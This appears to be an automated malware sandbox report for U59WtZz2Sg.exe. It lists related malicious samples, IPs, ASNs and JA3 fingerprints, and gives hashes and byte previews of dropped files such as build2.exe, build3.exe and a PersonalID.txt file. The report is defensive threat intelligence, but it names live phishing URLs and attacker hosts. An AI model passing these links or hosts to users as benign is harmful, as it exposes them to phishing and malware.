	ox8mZgHPBu.exe	Get hash	malicious	Browse	186.182.55.44
	iceFUhrkza.exe	Get hash	malicious	Browse	189.143.175.39
	1PfGGmXTX4.exe	Get hash	malicious	Browse	1.248.122.240
	RphdlxCpR9.exe	Get hash	malicious	Browse	190.141.60.22
	file.exe	Get hash	malicious	Browse	211.119.84.111
	file.exe	Get hash	malicious	Browse	186.182.55.44
	file.exe	Get hash	malicious	Browse	189.143.175.39
	file.exe	Get hash	malicious	Browse	211.171.233.126
	ntbtZBL4MO.exe	Get hash	malicious	Browse	211.40.39.251
	n0ZfZ3VKxx.exe	Get hash	malicious	Browse	1.248.122.240
	file.exe	Get hash	malicious	Browse	210.182.29.70
	file.exe	Get hash	malicious	Browse	185.95.186.58
	file.exe	Get hash	malicious	Browse	190.117.75.91
	woQvRigJT5.exe	Get hash	malicious	Browse	203.91.116.53
	0LpQnXvnXt.exe	Get hash	malicious	Browse	37.234.251.221
fresherlights.com	SyyMuhzBJ3.exe	Get hash	malicious	Browse	210.182.29.70
	5cv9BUrXBI.exe	Get hash	malicious	Browse	190.219.54.242
	file.exe	Get hash	malicious	Browse	211.40.39.251
	b7tUR4gfU4.exe	Get hash	malicious	Browse	138.36.3.134
	xk6tbrMM99.exe	Get hash	malicious	Browse	116.121.62.237
	gOwRr6jiYd.exe	Get hash	malicious	Browse	178.31.176.42
	SIsl0Fy3bx.exe	Get hash	malicious	Browse	37.234.251.221
	ox8mZgHPBu.exe	Get hash	malicious	Browse	175.126.109.15
	gw1bs5WMbY.exe	Get hash	malicious	Browse	222.236.49.123
	file.exe	Get hash	malicious	Browse	187.195.142.19
	iceFUhrkza.exe	Get hash	malicious	Browse	189.143.175.39
	1PfGGmXTX4.exe	Get hash	malicious	Browse	87.119.100.220
	RphdlxCpR9.exe	Get hash	malicious	Browse	31.166.45.179
	file.exe	Get hash	malicious	Browse	175.126.109.15
	file.exe	Get hash	malicious	Browse	222.236.49.123
	file.exe	Get hash	malicious	Browse	211.53.230.67
	file.exe	Get hash	malicious	Browse	211.53.230.67
	file.exe	Get hash	malicious	Browse	37.34.248.24
	file.exe	Get hash	malicious	Browse	203.91.116.53
	ntbtZBL4MO.exe	Get hash	malicious	Browse	200.46.66.71

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HETZNER-ASDE	#U25b6 #Ud83d#Udd18#U2500#U2500#U2500#U2500#U2500#U2500#U2500 126 Voice-Attchment.919-340-XX.html	Get hash	malicious	Browse	88.99.17.3
	file.exe	Get hash	malicious	Browse	88.198.94.71
	XJXuWlR8TZ.exe	Get hash	malicious	Browse	88.198.94.71
	RFQ_SFOETH12.js	Get hash	malicious	Browse	144.76.136.153
	7a087c1bcd038c61ddb0f634f9b21e6db9bed59842f19.exe	Get hash	malicious	Browse	88.198.94.71
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fpostsign.web.app/r9s0h3lind07rhinda51arn0h3ldr9slarkd07r9s0h3nW1&c=92652	Get hash	malicious	Browse	144.76.96.82
	file.exe	Get hash	malicious	Browse	88.198.94.71
	OAeO1VtpMo.exe	Get hash	malicious	Browse	116.202.5.223
	R4VIeZPAc7.exe	Get hash	malicious	Browse	116.202.5.223
	solicitud de presupuesto 29-11-2022.exe	Get hash	malicious	Browse	144.76.136.153
	c7oqCiKzbF.exe	Get hash	malicious	Browse	88.198.94.71
	nppshell.exe	Get hash	malicious	Browse	95.217.151.129
	SecuriteInfo.com.Win32.PWSX-gen.9296.19888.exe	Get hash	malicious	Browse	95.217.31.208
	D009780.exe	Get hash	malicious	Browse	95.216.34.216
	DOC999-2022.rar	Get hash	malicious	Browse	95.216.247.165
	mujkxuRYxu.exe	Get hash	malicious	Browse	116.202.5.223
	prog.apk	Get hash	malicious	Browse	144.76.58.8
	https://ipfs.io/ipfs/QmZscYPiZiEyUufsiTp73rjGySUVKx6mbYrEnns9n7DNVh?filename=ownredirectautoweb.html#news@pitchfork.com	Get hash	malicious	Browse	188.34.190.28
	m47Lhz6xqW.exe	Get hash	malicious	Browse	148.251.234.83
	ZbYq1RnBWJ.exe	Get hash	malicious	Browse	148.251.234.83
CJNET-ASCheiljedangCoIncKR	file.exe	Get hash	malicious	Browse	116.121.62.237
	file.exe	Get hash	malicious	Browse	116.121.62.237
	file.exe	Get hash	malicious	Browse	116.121.62.237
	file.exe	Get hash	malicious	Browse	116.121.62.237
	file.exe	Get hash	malicious	Browse	116.121.62.237
	file.exe	Get hash	malicious	Browse	116.121.62.237
	file.exe	Get hash	malicious	Browse	116.121.62.237
	file.exe	Get hash	malicious	Browse	116.121.62.237
	file.exe	Get hash	malicious	Browse	116.121.62.237
	YYDFQT2y6l.elf	Get hash	malicious	Browse	154.10.216.105
	file.exe	Get hash	malicious	Browse	116.121.62.237
	file.exe	Get hash	malicious	Browse	116.121.62.237
	file.exe	Get hash	malicious	Browse	116.121.62.237
	file.exe	Get hash	malicious	Browse	116.121.62.237
	file.exe	Get hash	malicious	Browse	116.121.62.237
	file.exe	Get hash	malicious	Browse	116.121.62.237
	file.exe	Get hash	malicious	Browse	116.121.62.237
	file.exe	Get hash	malicious	Browse	116.121.62.237
	TFY6m4XxhK.elf	Get hash	malicious	Browse	154.10.35.103
	file.exe	Get hash	malicious	Browse	116.121.62.237

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	#U25b6 #Ud83d#Udd18#U2500#U2500#U2500#U2500#U2500#U2500#U2500 126 Voice-Attchment.919-340-XX.html	Get hash	malicious	Browse	162.0.217.254 149.154.167.99
	file.exe	Get hash	malicious	Browse	162.0.217.254 149.154.167.99
	http://big55555.com	Get hash	malicious	Browse	162.0.217.254 149.154.167.99
	PO.exe	Get hash	malicious	Browse	162.0.217.254 149.154.167.99
	Benefits_Enrollment.html	Get hash	malicious	Browse	162.0.217.254 149.154.167.99
	Markelcorp Pay Application November 29, 2022_11725512247820161423.html	Get hash	malicious	Browse	162.0.217.254 149.154.167.99
	https://cialistabspharmacy.com/polaris/?aW52b2ljZUBlbWVyZ2lmaS5jb20=&d=DwMFAg	Get hash	malicious	Browse	162.0.217.254 149.154.167.99
	era 1.exe	Get hash	malicious	Browse	162.0.217.254 149.154.167.99
	Markelcorp Pay-Application Completed November 29, 2022_48707712230774110046.html	Get hash	malicious	Browse	162.0.217.254 149.154.167.99
	Remittance.html	Get hash	malicious	Browse	162.0.217.254 149.154.167.99
	November Draw Disbursed.html	Get hash	malicious	Browse	162.0.217.254 149.154.167.99
	November Draw Disbursed.html	Get hash	malicious	Browse	162.0.217.254 149.154.167.99
	7a087c1bcd038c61ddb0f634f9b21e6db9bed59842f19.exe	Get hash	malicious	Browse	162.0.217.254 149.154.167.99
	https://dobredrogi.exone-web.pl/INDEX.Php/login/ses/	Get hash	malicious	Browse	162.0.217.254 149.154.167.99
	http://web.jiont2.com	Get hash	malicious	Browse	162.0.217.254 149.154.167.99
	https://b6dj2ueylkg.juraganrc.com/?url=aHR0cHM6Ly9ob2xseS1sYXZlbmRlci1yYXR0bGVzbmFrZS5nbGl0Y2gubWUvdmlsZC5odG1s	Get hash	malicious	Browse	162.0.217.254 149.154.167.99
	0321423605241625.exe	Get hash	malicious	Browse	162.0.217.254 149.154.167.99
	PDF.shtml	Get hash	malicious	Browse	162.0.217.254 149.154.167.99
	Notification Details.html	Get hash	malicious	Browse	162.0.217.254 149.154.167.99
	https://schemevolcanosuspicions.com	Get hash	malicious	Browse	162.0.217.254 149.154.167.99

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\15593502492893213849595709

Download File

Process:	C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.287139506398081
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
MD5:	292F98D765C8712910776C89ADDE2311
SHA1:	E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
SHA-256:	9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
SHA-512:	205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\28325875654976084354326271

Download File

Process:	C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 2, database pages 36, 1st free page 10, free pages 4, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	0.45387870883890413
Encrypted:	false
SSDEEP:	96:iWvdU+bb3DtSOaDN6tOVjN9DLjGQLBE3u:iWvK+H3NGN6IVj3XBBE3u
MD5:	9D9851BF9104273B5AB6337A4E38A4AE
SHA1:	0FF6130A7A10B06B73DAB3687ABA6FCD4E92C2E8
SHA-256:	DBC976D79FBC0F3BA62CDEA6EFDDEEAE0ADD7EBF092B865DBB907A1D9B9DA5E1
SHA-512:	DEF485857FB1F882895122AF5ABBC502E708CA62735FF8AC855DEAEC7334D9858019D7889E90B64258EA08E634F3826B7962C29F331392670521C6EABEA0F5E8
Malicious:	false
Preview:	SQLite format 3......@ .......$...........&......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\28516965580031020035471649

Download File

Process:	C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 2, database pages 36, 1st free page 10, free pages 4, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	0.45387870883890413
Encrypted:	false
SSDEEP:	96:iWvdU+bb3DtSOaDN6tOVjN9DLjGQLBE3u:iWvK+H3NGN6IVj3XBBE3u
MD5:	9D9851BF9104273B5AB6337A4E38A4AE
SHA1:	0FF6130A7A10B06B73DAB3687ABA6FCD4E92C2E8
SHA-256:	DBC976D79FBC0F3BA62CDEA6EFDDEEAE0ADD7EBF092B865DBB907A1D9B9DA5E1
SHA-512:	DEF485857FB1F882895122AF5ABBC502E708CA62735FF8AC855DEAEC7334D9858019D7889E90B64258EA08E634F3826B7962C29F331392670521C6EABEA0F5E8
Malicious:	false
Preview:	SQLite format 3......@ .......$...........&......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\50023325401737157063598945

Download File

Process:	C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\53195122028892118046415569

Download File

Process:	C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.287139506398081
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
MD5:	292F98D765C8712910776C89ADDE2311
SHA1:	E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
SHA-256:	9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
SHA-512:	205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\69859612379489584907088796

Download File

Process:	C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.4393511334109407
Encrypted:	false
SSDEEP:	24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
MD5:	8C31C5487A97BBE73711C5E20600C1F6
SHA1:	D4D6B04226D8FFC894749B3963E7DB7068D6D773
SHA-256:	A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
SHA-512:	394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\SystemID\PersonalID.txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.8208888513501895
Encrypted:	false
SSDEEP:	3:cRJ1x6qwZdUmnIQdOX:cHGxnti
MD5:	53BC8AA5E48C1DA5C959E645EBD3BF0B
SHA1:	1425194A71023EB54098B76F5DE96C89D06CBFA3
SHA-256:	8D177185C26DB03DA48D7944B355DAAEC9FA251A377401DE195F7520FFE84B53
SHA-512:	DEC60480AEABE911DFA29F92C37ED8A3E89342A8A34834FE96B97DEF47A3A4633897AA65D5A93033DEAD54E504B5204EC4031ACCF6D4C09C63A560BF6EA0FC30
Malicious:	false
Preview:	K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS..

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	459
Entropy (8bit):	7.535586892873741
Encrypted:	false
SSDEEP:	12:vc6EeJgoT/kJTZH0g1W/9JgHFWVMtcii9a:vc6zwJTZUd6WVybD
MD5:	28C137D21FF97436D503CB1FC791D488
SHA1:	4E4A9A6311E04B3E9FFAB8C7D5C9DE744BB5DCBF
SHA-256:	26FA2C2A74B0D9A23F4157810720E784EB520D6CB3C9AA99C16593B2A91D0858
SHA-512:	2FEAA4CBB25A2DA3D6CA3FA6209AF4C5F4C55C3B2FD4A5A587A09ACDE24E57A341D705828DB900FE6F09549EB8EB24993396C1E3636B355A6C708D699ADC3B7E
Malicious:	false
Preview:	2019/.Y...\..M..\|.]..(c..h..Tu<.E...u.}.<p...H.....jm....#..^}H!..atMZ1{...\|.f.,.L...i.DU.l.6...bAl.r?..J"]..P..#):"..2Q).j...r........0V.%.....s..V;.z.3.'.g..v........I...Zi(........p]........g\j....r..7V....:.....Z......O..W...X...-.W{h.M...e.m{...E.l.>....:...........H..G.@$.D.s.....j.!....Q. ~O?._..Y.&..q5.7..)C3>.M;M:.mq.......B.....[ ..Z....Aj.2..E_...lK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\4DDQNYCN\www.msn[1].xml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	347
Entropy (8bit):	7.2641222679610795
Encrypted:	false
SSDEEP:	6:hnMyNmQqSg4/yUY5PEgh3YMXrrZe8tYFt0mOk05OGxntHcii96Z:zNiSgoFOPEghoM7AEgt0mLCRtcii9a
MD5:	5C207E0ED495D67925B2ED17358A7AD7
SHA1:	E241A04EE6971342F9AFAFFDA97A1BA16AB89974
SHA-256:	022028B912BEB092B738681DE41CA794FE3941E30E161169272C898107950613
SHA-512:	125A098430FD7EC198CE394576C893E79404F12AD1B44A78ED46F1F56DF1B0975DDD9F278B0DE76E3970445E6B3F93474B07B3EF77B0F5E807D368F04D2C99A1
Malicious:	false
Preview:	<root!.......@.."..../.Q....a.R...b...+4-qr\..[.K.......j!..(.7.:Ul$]..M.....E...uK.d.sD..6..c3.)O.[K..T<\..)Zc.3.[.Wt.......%.--8)).....a.6..(.-.Xu.#L.....V..&.D)..}.\|.LT$....}o.a..V......U.5.S!>g..8{\|...e..T....[}..Ma..j.W..c......{.nF.T@..3e....%.h.v.G...K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	680782
Entropy (8bit):	7.986526926520813
Encrypted:	false
SSDEEP:	12288:EEmMtgZhgT9uMA9F8GJF6y9NbgGUx0kXZPwtSRGG/t6i5l5kCYlSV:NmMtScu93d9V3U/XZPwYRGQ6i5l5k5lE
MD5:	E9FE84B69073056ECAC6B24F92F6F06B
SHA1:	7C015C421C888F822EBD97E41EC4FC0C9FFEDAFA
SHA-256:	494AC478C50EF9CBC55ED6C7D324CE84AE63FBF0809825C58C17BE91D4078CEC
SHA-512:	1FBEA24E99F888BE972110079B2F00A32E8D54F57D477B79C8E3500A1999923AA524EA5F7802EC525EB1C97BBE554D1F2EEA75F68C3DA271DC496BC207036F7E
Malicious:	true
Preview:	MZ...,...zz]..1..8@ .....d}(z.#}.e..N?cn.s.~.$.Y...=.K_...N...I...x..l.8@.^W...M...(.W.;8..i..O.h...~...'...O=i..;vgC....Io..[7..sN.O.T}.B..X.._...\|V..A....(.A..l].....o..S...s..0l.3.~.N....b.M....E.q.k.d.R..P......I.......(?.+u...............!..;.%..Ov.......r.......;Q.o....-^.Vs..l.....g.W....q...;.b..T.3:....9...U.`.[....m.T.8.j..t......U.....mUrW,.P@.>..^...=R#.>.9D.+=.Z.].rQ.7.X./.............."D'.A..Pv^.yrb...y.D...-P.,/7....=P.f..;.G..V&...<<c_.UH._...)F..r.+.p.3.....Q.c..].I...j.&?OO...U.lj+.e...z....]q........mx.DVOM..:dG.}s.9.......m....4.p.-%...5.~.&..VQP_.n.[...v..@(.:c~]i..d......7....%."......cl._........$l.G...!^.ta...H.?.)..:jS<._z.8)R....E....DZ&.R.z.PJWE3d..i.]...*,.GZYLv[...(.C...k(66....V...g}.;U&..&.g......p..?T.^.Y....I.[.$...I...Y..I.......a....b..2...IQ..E.w..N.vv..)..LN(.{...y.../.)~..v...b.g _..?..0.YyAoR.JJR..G... .Dn.w..I..a.V...W<...l..j...S...:G.N..M.k..h...)..)...]...t.[..1.=..b.I....V5.G...KE}K......4f..

C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	264526
Entropy (8bit):	7.940912258179112
Encrypted:	false
SSDEEP:	6144:e93X+uSFbjtZ75h10z8LCPd7JkwzLs0+mKnBtt7:e93X+jJLCPNSwz5tItt7
MD5:	4CC7A6D87A0FF8F645877054501FE9E7
SHA1:	C17DDD0E5ACB6144D01F8A875FA5BA26549E37D7
SHA-256:	46514ABE0BE791F544BA44E2E6348C24174683A15DB8B53EFFA79F0DB506A795
SHA-512:	A09E1D4C4FE972E0361BD49F7F9D4F9A0D8645879F6D64013DA722A2B679AB85C4D9BC88CE9012342C325D367AE59A8EF1C50E82C372B6689FDE507185A2532B
Malicious:	true
Preview:	MZ.......'.?.@......Q.q_.BWF5P.c3\|o....0f.A`....PzK....._).V.....\|..;Y..z....b<....K..q...}..i8P..7E..S......bv.W..\..3(%b..Cs..{;....o...w.R`.::..7Bh.Kg.;].,... .G .[..<-......'.....PZ......".3e..g....ue...^...G....?.).gA&(.W.o..#Zd4(.GZ......3..........+.oP1F.W..(-.&y.hO..GY..h...)...J.5.P.`.w\|....1$.......nd.....:b...f.0.s.3..l.E.:). pmUt.....S.....l....t.G.a;....1sP.O3..=..&.O9..$.......#.l&&..T..s^N..d:.L.[.[.o..A.3.....MIt..q.f.\|..-(s..D.;..q..I.CV.N.1...Ty..=L..a......=...8K...?.C... 9N...s....M...R..I.../.E\|..pJ.:.0H....(.\|(%..l.......;.0....S..`c.p.:..}......H..1........c..B....j.G.1..r...d...SB..gl.{u.<.....c...r\...]c...oG.&....h7....Y.>.\x...J..e....}.?fZ...4l{...#..;.h...Q..CA..#.=..Sb..t0......6..z7..p...1..NRS.\|.<Q2.UT..f0.-:$.X.!....m.3.....+...4..MY..f.s(.6.R.Jj.Kvf.gw:."Cv...6.q.B.8.{p"[.5.^$$=.[up....RV..*.O.Fn.............\D94f.......U...fV.K..o...~....EK.:&.3k.....O.. ....0o..J.."......:'..L).{.j...v...whOo

C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	10062
Entropy (8bit):	7.984005486813951
Encrypted:	false
SSDEEP:	192:V9m073yH7khKup9kt2c7qLmPsCU5hHxmJykUEii26iLH5/:V407ClMFzh5BIJyR1j5/
MD5:	3A101335FA444CEA59A97CF434AE57D9
SHA1:	07828E3E75F853D54EF9BB67A429DE41A6BBA13B
SHA-256:	0E1326746EAEA1C2FA3990FB83F5B0974E5AC457321F3728CA5E6C8A8E98ECAB
SHA-512:	9F2EAFF8137C034D5B2F95A00EC48EB6FF24F1DFB490AA75DAFB32310648CA1603286F3478795CCAEFC729CC84B840568E0861C94B42B6CA75AAA020B9FE9E11
Malicious:	true
Preview:	MZ...OA........-...g.O.q..9$.@4f...E"..0..AH....v..s.......P`w1.x'.Q....p.}u(=N.y.)4..tj=..\..3khaA..S.+..c....d.......2?1...@_8.1......'.....Di.....8...O.....%# /...73.q...:..p:.R3...\.'.P.,'.x.qy.8U.l..Yc..&....\|...."p.M....6?B.#9.ES1...0...O.?...$.%m..kn.p.,...nZF.-3..t.kkd..,e\...\...v.E...}i..c:...i...C.(....pxY.a.m.."..\|..2Bo../)M).y.J./.Ax...$..a.T]}...0q.IXr.n..Ag..'.X......[.?...T.G..H.m{M]{...e7("gD..D....%....M.."wM.$.TD.-S.HV}..y+_4s.....;...z...z.hb[.fG.vH...d.}....A.p.u<.D.C.#L..=6.K.m.?%X$.?.!&p`@..M..R1.S5..~.$.L{NFj.~~).<6g....[.Z..~..R..>._.0`A.Hx....<....4g..H......u8...3F.<...F.....3..>.....I....H..k.`.f-.......(.U..:..!.....dg.=-!.....j..F...%z..%...C.P..BV....eF.T.]!.q\|.>(..._;v.G.m.x..-../9.{.W2..w.a...sG..e..$"..jb..h.l.......(.<..Nr......'0ipfda.....f..zk..\|.L.k.....a.T........5..th.......$q@..:.../..O.9..}...\.+......cX..8Y.E...G$.Q........&\|. Ta}..e...?.....Y.O.-.I....~...\[..dXL/........s.....{...}.{..*.......

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt19.lst

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1369
Entropy (8bit):	7.863573339496023
Encrypted:	false
SSDEEP:	24:VLbeYA4DODXARa+TnM/6MJjMeChPB+SXA+ixLHdhUDj857n2+9TSibD:VuJ4DODXARa+Tno6cjMe2cSXFixYe7nn
MD5:	E837F9AF72A9F997C231D71514E4B137
SHA1:	E6B40E013D7A115BDCDB653C7A7D4C5519A1B3A5
SHA-256:	82FFF461C64E101A2D749968BBF95E2F2072C697DADF1F57FF429208A31A57DE
SHA-512:	4E22F42CA238D5CD0E77E741F6F7BBEB33EA0FBB79A4A26EF2ECC26D7B08C9C436C34EF47559139AD8AA038942F82FDADD87D4A6F4CD478B2ABBA8AF192A717A
Malicious:	false
Preview:	%!Ado...S.]mD.h5...Qwc.zB.[.........;.6.!..nf4..(5..s."....v...W..<..xU...XQ.(......J..b.X.Rg?..".....(...."h..I..h.....F.....L....<\ T...Pea.........,f_.....2v(/.Ob_ .N....I.n...$.f.....N....\|..}...(.(..g...=.]......Y.....&...y...8...U..........D9.R23...c.ljY4.SV..>.....vV.I...d...g04....v.....^.o...ud.... ...a.Yg.Gv<..........3.s..3 ..THY.~.f.O6.&.}L.l..M.....{...O..p...q.b.M.....=.v...G..N.vY.z...$.:p.[.smgl....Z.1k....:@.=.R..r.../.BBZHt.g+.'86!.cKN.)..\|.."w..QUr..4r.l...Wb-<.;.d3.j.2....8n..@.=......1...mBYf...r0{.Yh.x...V.-.w!..ig....P....3.L....t..En......I.Fr.....n.0..<c..B...r....'.....ri.h.....5......~.....NX.:...C...q.D.M.\..6...^.~..^....s.=....#...}u..<..7....G+>...I...\|.O....a"p.........Z.....6.Wp.*.{\|.\|u.\.....)am..Q.iFNk.-.W7..:........hZ.c[......R.N.q....T..2f.J%49...c.9.....K..e.m...m......n#...{S.b...M.<..t...).3!..r&B.vS.r...W.?.@....O..]<:N..8.G;....5.m.4...#.R...2.W...D.6.j.7.....W..3)v....A..x.Q...-l_K..7DF\

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	80722
Entropy (8bit):	7.9980796222227974
Encrypted:	true
SSDEEP:	1536:clFKoAPYZVLFonlb5TwBeLTjBy4TxNvJic7dx8WJ4tTjJTyWlyEY:2APYXBzGjB70Q8dJyWcL
MD5:	CBD4463D49BD83DC35F969FEB02B6D97
SHA1:	2BF9EA7EBFA774F63CA54E9CDF1D003878ECBD32
SHA-256:	2B7095CA74E695B564A04875FC74CD590B078AFB89E7806C2F9700976E458364
SHA-512:	80A89F75374FAD67846ECDFE12FFCC86969F8310D9337B063399CD2356DBF430A543D20F3CE0987333D0B082B30DDE416597969A0D7DA4F34AC83F0AD1DA0BD2
Malicious:	true
Preview:	%!AdoT..N..j.,..\|..(..X.1...r3y.(.&..kWZ.!.....x......?..J......4u4;......F......-'...K.#..FyP.....1....:."..!....\|f}s....{.O..8......K..H..?5.5].9)5l.Lpt`....;0..r.f.]WT.......T~.&.K4[x....?'..Uo>...K..\R.....}...Y.0u9...P...1b.p.U.....o.P.^..lJ..~.9..y..Ar.e....Z....~$Q..IU...`%..?......5.....V..]...92...~M....Nx..%.9T.s....:..;'PD_i...{.u!..ty..P...H=.O........S..'c.?.....K.~.).......#..&..N9I3.P...i]?...G........]D.g....4y@...J.:..W.h._..@Q..s....<..m.IK3Q.._O....S5....0.l..Kn+.P.7.-.......O. 